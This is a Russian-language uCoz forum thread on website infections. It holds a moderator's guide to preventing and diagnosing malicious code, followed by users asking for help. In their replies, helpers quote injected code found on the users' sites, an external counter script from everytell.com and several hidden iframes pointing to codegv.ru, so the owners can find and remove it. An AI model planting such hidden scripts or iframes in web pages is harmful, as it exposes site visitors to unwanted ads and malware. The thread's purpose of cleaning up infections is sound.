Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    quarzit
    Сообщений: 142
    Репутация: 19

    Сообщение # 1756 | 08:06:21
    Подскажите, как убрать рекламу на http://quarzit.narod.ru При заходе на сайт с андроида появляется реклама http://m1.mobiads.ru
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1757 | 10:43:35
    quarzit, оплатите один из пакетов услуг http://tariffs.ucoz.net/
    quarzit
    Сообщений: 142
    Репутация: 19

    Сообщение # 1758 | 13:15:59
    $Vladimir$, реклама Mobiads (mobiads.ru) это не вирус, а реклама от Сообщество uCoz ?
    я правильно понял?
    Сообщение отредактировал quarzit - Суббота, 14 Мар 2015, 13:17:19
    Drimorg
    Сообщений: 2
    Репутация: 0

    Сообщение # 1759 | 16:01:28
    Здравствуйте. помогите пожалуйста,с недавних пор при нажатии на главную страницу сайта или каталог файлов открывается новая вкладка вот с этой ерундой -http://count.everytell.com/-,сайт bezprogramm.su,заранее спасибо.
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1760 | 16:07:24
    quarzit, это рекламный баннер uCoz для мобильных

    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1761 | 16:08:05
    Drimorg, вижу на главной. откройте главную на редактирование так
    панель управления - редактор страниц - управление страницами сайта - главная - напротив главной жмите на разводной ключ - страница откроется на редактирование - там в коде ищите вставку
    Код
    <script type="text/javascript" src="http://count.everytell.com/java/watch.js"></script>
    <div id="counter-st-image-box" style="display: none;">
    <script type="text/javascript">
    /*<![CDATA[*/
    try { var count1778 = new ST();
    var thisHostParent="everytell.com";
    var thisHost="http://r51.ucoz.ru";
    count1778.init(1778);
    } catch(e){}
    /*]]>*/
    </script>

    находится сразу под фотошопом онлайн

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Drimorg
    Сообщений: 2
    Репутация: 0

    Сообщение # 1762 | 23:54:07
    Цитата webanet ()
    Drimorg, вижу на главной. откройте главную на редактирование так панель управления - редактор страниц - управление страницами сайта - главная - напротив главной жмите на разводной ключ - страница откроется на редактирование - там в коде ищите вставку

    блин спасибо...перебаловался наверно с popunder....еще раз спасибо
    trick5685
    Сообщений: 6
    Репутация: 15

    Сообщение # 1763 | 19:32:43
    Захожу с другого компа на свой сайт hizhina-hutsula.ucoz.com в каталог статтей и на некоторые другие ветки, аваст сцуко блокирует. Если не сложно подскажите что это и как с этим чудом бороться. Спасибо

    Добавлено (18 Мар 2015, 19:32:43)
    ---------------------------------------------
    Ребят, отпишитесь как у вас.. Антивирусник не пищит?

    trick5685
    Сообщений: 6
    Репутация: 15

    Сообщение # 1764 | 19:42:32
    Вот что у меня віскакивает
    Прикрепления: 4508492.jpg (84.6 Kb)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1765 | 19:45:51
    trick5685, сайт должен блокироваться, потому что в некоторых материалах на сайте есть вставки
    Код
    <p><iframe id="zunifrm" src="about://codegv.ru/u.html" style="display: none;"></iframe><iframe id="zunifrm" src="about://codegv.ru/u.html" style="display: none;"></iframe><iframe id="zunifrm" src="about://codegv.ru/u.html" style="display: none;"></iframe><iframe id="zunifrm" src="about://codegv.ru/u.html" style="display: none;"></iframe><iframe id="zunifrm" src="about://codegv.ru/u.html" style="display: none;"></iframe>

    пример материала http://hizhina-hutsula.ucoz.com/publ....1-0-119 и так во многих. вероятнее всего заражен ваш браузер, который в среде визуального редактора добивает в содержимое указанный код.
    лечить путем смены браузера и удаления подобных вставок в материалах

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    akula-z
    Сообщений: 214
    Репутация: 43

    Сообщение # 1766 | 13:28:25
    Добрый день.
    Прошу вашей помощи помочь разобраться с одной проблемой.
    Началось все с того, что на сайте просел трафик, я написала в техподдержку Яндекса, и мне ответили вот что: "В настоящий момент Ваш сайт ранжируется в результатах поиска с ограничениями со стороны алгоритмов, т.к. на его страницах были выявлены
    назойливые виды рекламы. К таким видам рекламы относятся, например,
    попандеры, кликандеры, редиректы родительского окна. В Поиск также
    внедрены методы распознавания шокирующей рекламы и обманных уведомлений.
    Возможно, страницы с подобными элементами были размещены на сайте без
    Вашего ведома."
    Также, сегодня пользователи сообщили мне, что у них при заходе на мой сайт выскакивает попандер, но я его вообще не вижу, так как на сайте нет никакой агрессивной рекламы.
    Я ничего не могу понять, что происходит с сайтом и что именно мне нужно удалить, как советует Яндекс? Может быть это вирус какой-то или еще что-то, или может кто-то без моего ведома на сайт что-то вредное загрузил?
    Помогите, разобраться, пожалуйста.
    Вот адрес сайта
    Вот здесь вот, если делать проверку сайта, выдает, что какие-то мальваре установлены у меня. Ссылка
    Сообщение отредактировал akula-z - Четверг, 26 Мар 2015, 13:30:09
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1767 | 16:05:30
    akula-z,
    Цитата
    что какие-то мальваре установлены у меня
    никогда не посещайте так называемые онлайн проверки на вирусы. все они крайне сомнительно качества и созданы для выкачивания денег у испугавшихся результатов их бредовых проверок

    походила по сайту не вижу явного заражения. опросите пользователей на счет того на каких именно страницах у них показывались попандеры и были ли они при этом авторизованы
    очень плохо, что вы раздаете грязные загрузчики. не знаю что там у вас с рекламой, а вот за такие файлы для гостей (а роботы на сайте гости) вас легко могли фильтрануть
    итак. ещё раз. опросите пострадавших на каких страницах они видели попандеры и были ли они авторизованы. в идеале спросить видят ли они попандеры постоянно или периодически

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    akula-z
    Сообщений: 214
    Репутация: 43

    Сообщение # 1768 | 18:20:45
    webanet, Пользователи авторизированы не были. Попандер был при заходе на главную страницу.
    Спросила, сказали, что попандеров не было пару дней назад, а сегодня наткнулись.
    Плюс Яндекс видит агрессивную рекламу где-то и пессимизирует сайт, но это точно не от этого, что там стоит загрузчик. Загрузчик требует установки php, а на Юкозе php только за деньги, поэтому загрузчик находится на другом хостинге, который имеет php. Так что, это точно не от него, а из-за чего-то другого.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1769 | 18:27:02
    akula-z, код загрузчика прекрасно просматривается из исходника

    по рекламе. отключите стандартную рекламу на сайте

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    akula-z
    Сообщений: 214
    Репутация: 43

    Сообщение # 1770 | 20:20:11
    webanet, так что выходит, что попандер вызывается стандартной рекламой юкоз?
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: